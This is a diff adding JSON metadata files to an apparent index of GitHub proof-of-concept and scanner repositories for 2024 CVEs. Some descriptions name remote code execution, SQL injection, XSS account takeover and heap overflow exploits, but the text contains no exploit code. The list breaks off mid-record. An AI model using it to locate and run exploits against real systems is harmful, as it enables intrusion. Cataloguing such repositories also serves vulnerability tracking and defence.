"CVE-2024-4577 RCE PoC", + "fork": false, + "created_at": "2024-11-06T05:30:33Z", + "updated_at": "2024-11-22T12:52:03Z", + "pushed_at": "2024-11-20T06:24:59Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46209.json b/2024/CVE-2024-46209.json new file mode 100644 index 0000000000..c057331940 --- /dev/null +++ b/2024/CVE-2024-46209.json @@ -0,0 +1,33 @@ +[ + { + "id": 847872001, + "name": "CVE-2024-46209", + "full_name": "h4ckr4v3n\/CVE-2024-46209", + "owner": { + "login": "h4ckr4v3n", + "id": 117841523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117841523?v=4", + "html_url": "https:\/\/github.com\/h4ckr4v3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4ckr4v3n\/CVE-2024-46209", + "description": null, + "fork": false, + "created_at": "2024-08-26T17:52:27Z", + "updated_at": "2024-10-10T06:10:38Z", + "pushed_at": "2024-10-10T05:58:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46256.json b/2024/CVE-2024-46256.json new file mode 100644 index 0000000000..e27258aa2e --- /dev/null +++ b/2024/CVE-2024-46256.json @@ -0,0 +1,33 @@ +[ + { + "id": 859792463, + "name": "POC_CVE-2024-46256", + "full_name": "barttran2k\/POC_CVE-2024-46256", + "owner": { + "login": "barttran2k", + "id": 45133811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45133811?v=4", + "html_url": "https:\/\/github.com\/barttran2k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/barttran2k\/POC_CVE-2024-46256", + "description": "POC_CVE-2024-46256", + "fork": false, + "created_at": "2024-09-19T09:35:12Z", + "updated_at": "2024-10-23T00:37:03Z", + "pushed_at": "2024-09-19T09:47:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46278.json b/2024/CVE-2024-46278.json new file mode 100644 index 0000000000..7b51a43f3f --- /dev/null +++ b/2024/CVE-2024-46278.json @@ -0,0 +1,33 @@ +[ + { + "id": 848587631, + "name": "CVE-2024-46278-teedy_1.11_account-takeover", + "full_name": "ayato-shitomi\/CVE-2024-46278-teedy_1.11_account-takeover", + "owner": { + "login": "ayato-shitomi", + "id": 74812891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74812891?v=4", + "html_url": "https:\/\/github.com\/ayato-shitomi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayato-shitomi\/CVE-2024-46278-teedy_1.11_account-takeover", + "description": "【Teedy 1.11】Account Takeover via XSS", + "fork": false, + "created_at": "2024-08-28T03:17:37Z", + "updated_at": "2024-10-07T06:15:01Z", + "pushed_at": "2024-10-06T09:31:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46377.json b/2024/CVE-2024-46377.json new file mode 100644 index 0000000000..d3259453f6 --- /dev/null +++ b/2024/CVE-2024-46377.json @@ -0,0 +1,33 @@ +[ + { + "id": 861516451, + "name": "CVE-2024-46377", + "full_name": "vidura2\/CVE-2024-46377", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/CVE-2024-46377", + "description": null, + "fork": false, + "created_at": "2024-09-23T03:47:36Z", + "updated_at": "2024-10-13T04:50:31Z", + "pushed_at": "2024-09-23T03:51:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46383.json b/2024/CVE-2024-46383.json new file mode 100644 index 0000000000..bd3781fd8f --- /dev/null +++ b/2024/CVE-2024-46383.json @@ -0,0 +1,33 @@ +[ + { + "id": 863868784, + "name": "Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383", + "full_name": "nitinronge91\/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383", + "owner": { + "login": "nitinronge91", + "id": 101330376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101330376?v=4", + "html_url": "https:\/\/github.com\/nitinronge91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitinronge91\/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383", + "description": "CVE-2024-46383", + "fork": false, + "created_at": "2024-09-27T04:19:42Z", + "updated_at": "2024-11-14T10:28:43Z", + "pushed_at": "2024-11-14T10:19:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46451.json b/2024/CVE-2024-46451.json new file mode 100644 index 0000000000..87831d9da0 --- /dev/null +++ b/2024/CVE-2024-46451.json @@ -0,0 +1,33 @@ +[ + { + "id": 861304942, + "name": "CVE-2024-46451", + "full_name": "vidura2\/CVE-2024-46451", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/CVE-2024-46451", + "description": null, + "fork": false, + "created_at": "2024-09-22T14:47:57Z", + "updated_at": "2024-10-13T04:50:32Z", + "pushed_at": "2024-09-23T03:46:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46483.json b/2024/CVE-2024-46483.json new file mode 100644 index 0000000000..45a3d47929 --- /dev/null +++ b/2024/CVE-2024-46483.json @@ -0,0 +1,33 @@ +[ + { + "id": 874747179, + "name": "cve-2024-46483", + "full_name": "kn32\/cve-2024-46483", + "owner": { + "login": "kn32", + "id": 105210950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105210950?v=4", + "html_url": "https:\/\/github.com\/kn32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn32\/cve-2024-46483", + "description": "Pre-Authentication Heap Overflow in Xlight SFTP server <= 3.9.4.2", + "fork": false, + "created_at": "2024-10-18T11:46:14Z", + "updated_at": "2024-11-14T08:20:38Z", + "pushed_at": "2024-10-18T12:29:36Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46532.json b/2024/CVE-2024-46532.json new file mode 100644 index 0000000000..a10af43e20 --- /dev/null +++ b/2024/CVE-2024-46532.json @@ -0,0 +1,33 @@ +[ + { + "id": 864126030, + "name": "CVE-2024-46532", + "full_name": "KamenRiderDarker\/CVE-2024-46532", + "owner": { + "login": "KamenRiderDarker", + "id": 62374874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62374874?v=4", + "html_url": "https:\/\/github.com\/KamenRiderDarker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KamenRiderDarker\/CVE-2024-46532", + "description": "Reproduction of SQL Injection Vulnerabilities in OpenHIS", + "fork": false, + "created_at": "2024-09-27T14:39:54Z", + "updated_at": "2024-10-14T07:55:43Z", + "pushed_at": "2024-10-14T07:55:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46538.json b/2024/CVE-2024-46538.json new file mode 100644 index 0000000000..382224c17a --- /dev/null +++ b/2024/CVE-2024-46538.json @@ -0,0 +1,43 @@ +[ + { + "id": 877250777, + "name": "CVE-2024-46538", + "full_name": "EQSTLab\/CVE-2024-46538", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-46538", + "description": "Proof-of-Concept for CVE-2024-46538", + "fork": false, + "created_at": "2024-10-23T10:50:01Z", + "updated_at": "2024-11-15T17:31:24Z", + "pushed_at": "2024-11-06T10:56:41Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-46538", + "exploit", + "pfsense", + "php", + "poc", + "proof-of-concept", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46627.json b/2024/CVE-2024-46627.json new file mode 100644 index 0000000000..a5805836ae --- /dev/null +++ b/2024/CVE-2024-46627.json @@ -0,0 +1,33 @@ +[ + { + "id": 862873525, + "name": "CVE-2024-46627", + "full_name": "d4lyw\/CVE-2024-46627", + "owner": { + "login": "d4lyw", + "id": 53091736, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53091736?v=4", + "html_url": "https:\/\/github.com\/d4lyw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4lyw\/CVE-2024-46627", + "description": "CVE-2024-46627 - Incorrect access control in BECN DATAGERRY v2.2 allows attackers to > execute arbitrary commands via crafted web requests.", + "fork": false, + "created_at": "2024-09-25T10:32:53Z", + "updated_at": "2024-09-25T10:52:13Z", + "pushed_at": "2024-09-25T10:52:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46635.json b/2024/CVE-2024-46635.json new file mode 100644 index 0000000000..d0bfafa52e --- /dev/null +++ b/2024/CVE-2024-46635.json @@ -0,0 +1,33 @@ +[ + { + "id": 865729500, + "name": "CVE-2024-46635", + "full_name": "h1thub\/CVE-2024-46635", + "owner": { + "login": "h1thub", + "id": 167607208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167607208?v=4", + "html_url": "https:\/\/github.com\/h1thub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1thub\/CVE-2024-46635", + "description": null, + "fork": false, + "created_at": "2024-10-01T03:07:04Z", + "updated_at": "2024-11-11T08:25:02Z", + "pushed_at": "2024-10-01T17:59:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46658.json b/2024/CVE-2024-46658.json new file mode 100644 index 0000000000..1752e0bce5 --- /dev/null +++ b/2024/CVE-2024-46658.json @@ -0,0 +1,33 @@ +[ + { + "id": 867076537, + "name": "CVE-2024-46658", + "full_name": "jackalkarlos\/CVE-2024-46658", + "owner": { + "login": "jackalkarlos", + "id": 88983987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88983987?v=4", + "html_url": "https:\/\/github.com\/jackalkarlos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jackalkarlos\/CVE-2024-46658", + "description": "Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629", + "fork": false, + "created_at": "2024-10-03T12:12:23Z", + "updated_at": "2024-10-03T23:30:13Z", + "pushed_at": "2024-10-03T14:19:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46901.json b/2024/CVE-2024-46901.json new file mode 100644 index 0000000000..aefab5f1be --- /dev/null +++ b/2024/CVE-2024-46901.json @@ -0,0 +1,33 @@ +[ + { + "id": 871204333, + "name": "CVE-2024-46901", + "full_name": "devhaozi\/CVE-2024-46901", + "owner": { + "login": "devhaozi", + "id": 115467771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115467771?v=4", + "html_url": "https:\/\/github.com\/devhaozi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devhaozi\/CVE-2024-46901", + "description": "Subversion CVE-2024-46901 PoC", + "fork": false, + "created_at": "2024-10-11T13:28:55Z", + "updated_at": "2024-10-11T13:31:52Z", + "pushed_at": "2024-10-11T13:31:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46986.json b/2024/CVE-2024-46986.json new file mode 100644 index 0000000000..f5f9e97439 --- /dev/null +++ b/2024/CVE-2024-46986.json @@ -0,0 +1,33 @@ +[ + { + "id": 861297912, + "name": "CVE-2024-46986", + "full_name": "vidura2\/CVE-2024-46986", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/CVE-2024-46986", + "description": null, + "fork": false, + "created_at": "2024-09-22T14:27:35Z", + "updated_at": "2024-10-13T04:50:35Z", + "pushed_at": "2024-09-22T14:34:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4701.json b/2024/CVE-2024-4701.json new file mode 100644 index 0000000000..71d6a28a69 --- /dev/null +++ b/2024/CVE-2024-4701.json @@ -0,0 +1,33 @@ +[ + { + "id": 799940832, + "name": "CVE-2024-4701-POC", + "full_name": "JoeBeeton\/CVE-2024-4701-POC", + "owner": { + "login": "JoeBeeton", + "id": 11488268, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11488268?v=4", + "html_url": "https:\/\/github.com\/JoeBeeton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoeBeeton\/CVE-2024-4701-POC", + "description": "POC for CVE-2024-4701", + "fork": false, + "created_at": "2024-05-13T11:58:19Z", + "updated_at": "2024-08-19T22:21:38Z", + "pushed_at": "2024-05-13T12:56:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47062.json b/2024/CVE-2024-47062.json new file mode 100644 index 0000000000..7786dc6197 --- /dev/null +++ b/2024/CVE-2024-47062.json @@ -0,0 +1,33 @@ +[ + { + "id": 886019978, + "name": "CVE-2024-47062", + "full_name": "saisathvik1\/CVE-2024-47062", + "owner": { + "login": "saisathvik1", + "id": 51957422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51957422?v=4", + "html_url": "https:\/\/github.com\/saisathvik1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saisathvik1\/CVE-2024-47062", + "description": "CVE-2024-47062 PoC", + "fork": false, + "created_at": "2024-11-10T01:10:06Z", + "updated_at": "2024-11-13T02:17:35Z", + "pushed_at": "2024-11-13T02:17:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47066.json b/2024/CVE-2024-47066.json new file mode 100644 index 0000000000..5972ea1fb1 --- /dev/null +++ b/2024/CVE-2024-47066.json @@ -0,0 +1,38 @@ +[ + { + "id": 862261516, + "name": "CVE-2024-47066", + "full_name": "l8BL\/CVE-2024-47066", + "owner": { + "login": "l8BL", + "id": 151047781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151047781?v=4", + "html_url": "https:\/\/github.com\/l8BL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l8BL\/CVE-2024-47066", + "description": "Proof-of-Concept for CVE-2024-47066", + "fork": false, + "created_at": "2024-09-24T09:59:27Z", + "updated_at": "2024-11-20T16:31:05Z", + "pushed_at": "2024-09-24T15:35:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47076.json b/2024/CVE-2024-47076.json new file mode 100644 index 0000000000..5568b90570 --- /dev/null +++ b/2024/CVE-2024-47076.json @@ -0,0 +1,33 @@ +[ + { + "id": 864938618, + "name": "CVE-2024-47076", + "full_name": "mutkus\/CVE-2024-47076", + "owner": { + "login": "mutkus", + "id": 4324026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4324026?v=4", + "html_url": "https:\/\/github.com\/mutkus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mutkus\/CVE-2024-47076", + "description": "Linux ve Unix sistemlerinizin CVE-2024-47076 açığından etkilenip etkilenmediğini bu script ile öğrenebilirsiniz.", + "fork": false, + "created_at": "2024-09-29T15:13:58Z", + "updated_at": "2024-09-29T15:29:52Z", + "pushed_at": "2024-09-29T15:29:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47176.json b/2024/CVE-2024-47176.json new file mode 100644 index 0000000000..939e2265e9 --- /dev/null +++ b/2024/CVE-2024-47176.json @@ -0,0 +1,419 @@ +[ + { + "id": 863821082, + "name": "spill", + "full_name": "GO0dspeed\/spill", + "owner": { + "login": "GO0dspeed", + "id": 45773339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45773339?v=4", + "html_url": "https:\/\/github.com\/GO0dspeed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GO0dspeed\/spill", + "description": "POC scanner for CVE-2024-47176", + "fork": false, + "created_at": "2024-09-27T01:22:43Z", + "updated_at": "2024-10-15T16:00:15Z", + "pushed_at": "2024-10-07T19:07:54Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864227050, + "name": "CVE-2024-47176", + "full_name": "workabhiwin09\/CVE-2024-47176", + "owner": { + "login": "workabhiwin09", + "id": 31949319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31949319?v=4", + "html_url": "https:\/\/github.com\/workabhiwin09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/workabhiwin09\/CVE-2024-47176", + "description": "CUPS Browsd Check_CVE-2024-47176", + "fork": false, + "created_at": "2024-09-27T18:23:16Z", + "updated_at": "2024-09-27T18:43:29Z", + "pushed_at": "2024-09-27T18:43:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864262917, + "name": "CVE-2024-47176-Scanner", + "full_name": "tonyarris\/CVE-2024-47176-Scanner", + "owner": { + "login": "tonyarris", + "id": 58807068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58807068?v=4", + "html_url": "https:\/\/github.com\/tonyarris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tonyarris\/CVE-2024-47176-Scanner", + "description": "Scanner for the CUPS vulnerability CVE-2024-47176", + "fork": false, + "created_at": "2024-09-27T20:04:21Z", + "updated_at": "2024-09-27T20:09:21Z", + "pushed_at": "2024-09-27T20:09:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864586309, + "name": "CVE-2024-47176", + "full_name": "mr-r3b00t\/CVE-2024-47176", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2024-47176", + "description": "Scanner", + "fork": false, + "created_at": "2024-09-28T16:02:41Z", + "updated_at": "2024-09-30T07:58:40Z", + "pushed_at": "2024-09-30T06:19:59Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864641800, + "name": "CVE-2024-47176", + "full_name": "aytackalinci\/CVE-2024-47176", + "owner": { + "login": "aytackalinci", + "id": 80779474, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80779474?v=4", + "html_url": "https:\/\/github.com\/aytackalinci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aytackalinci\/CVE-2024-47176", + "description": "Vulnerability Scanner for CUPS: CVE-2024-47176", + "fork": false, + "created_at": "2024-09-28T19:01:31Z", + "updated_at": "2024-09-29T16:03:27Z", + "pushed_at": "2024-09-28T19:35:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864823983, + "name": "jugular", + "full_name": "lkarlslund\/jugular", + "owner": { + "login": "lkarlslund", + "id": 8929787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8929787?v=4", + "html_url": "https:\/\/github.com\/lkarlslund", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lkarlslund\/jugular", + "description": "Ultrafast CUPS-browsed scanner (CVE-2024-47176)", + "fork": false, + "created_at": "2024-09-29T09:05:30Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-10-07T19:24:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cups", + "cve-2024-47076", + "cve-2024-47175", + "cve-2024-47176", + "cve-2024-47177" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864993211, + "name": "CVE-2024-47176", + "full_name": "nma-io\/CVE-2024-47176", + "owner": { + "login": "nma-io", + "id": 9916363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9916363?v=4", + "html_url": "https:\/\/github.com\/nma-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nma-io\/CVE-2024-47176", + "description": "A simple CVE-2024-47176 (cups_browsed) check tool written in go. ", + "fork": false, + "created_at": "2024-09-29T17:53:50Z", + "updated_at": "2024-09-29T17:55:45Z", + "pushed_at": "2024-09-29T17:55:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867190495, + "name": "CVE-2024-47176", + "full_name": "l0n3m4n\/CVE-2024-47176", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-47176", + "description": "Unauthenticated RCE on cups-browsed (exploit and nuclei template)", + "fork": false, + "created_at": "2024-10-03T15:53:04Z", + "updated_at": "2024-11-19T17:59:37Z", + "pushed_at": "2024-10-03T17:11:17Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ctf", + "cups", + "cve", + "exploit", + "pentesting", + "rce", + "redteaming" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868024917, + "name": "CVE-2024-47176", + "full_name": "gumerzzzindo\/CVE-2024-47176", + "owner": { + "login": "gumerzzzindo", + "id": 114024126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114024126?v=4", + "html_url": "https:\/\/github.com\/gumerzzzindo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gumerzzzindo\/CVE-2024-47176", + "description": null, + "fork": false, + "created_at": "2024-10-05T09:22:36Z", + "updated_at": "2024-10-05T10:05:20Z", + "pushed_at": "2024-10-05T10:05:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868786835, + "name": "CVE-2024-47176-Scanner", + "full_name": "MalwareTech\/CVE-2024-47176-Scanner", + "owner": { + "login": "MalwareTech", + "id": 7256561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7256561?v=4", + "html_url": "https:\/\/github.com\/MalwareTech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalwareTech\/CVE-2024-47176-Scanner", + "description": "A simple scanner for identifying vulnerable cups-browsed instances on your network", + "fork": false, + "created_at": "2024-10-07T07:25:18Z", + "updated_at": "2024-11-21T08:57:56Z", + "pushed_at": "2024-10-07T16:59:47Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 58, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869045054, + "name": "CVE-2024-47176", + "full_name": "AxthonyV\/CVE-2024-47176", + "owner": { + "login": "AxthonyV", + "id": 141282212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141282212?v=4", + "html_url": "https:\/\/github.com\/AxthonyV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AxthonyV\/CVE-2024-47176", + "description": "This repository contains a scanner for detecting vulnerabilities in the cups-browsed service of CUPS (Common Unix Printing System). The vulnerability CVE-2024-47176 allows a remote attacker to exploit an insecure configuration of the daemon, potentially leading to arbitrary code execution.", + "fork": false, + "created_at": "2024-10-07T16:14:37Z", + "updated_at": "2024-10-07T16:14:50Z", + "pushed_at": "2024-10-07T16:14:46Z", + "stargazers_count": 0, + "watchers_count": 0, + 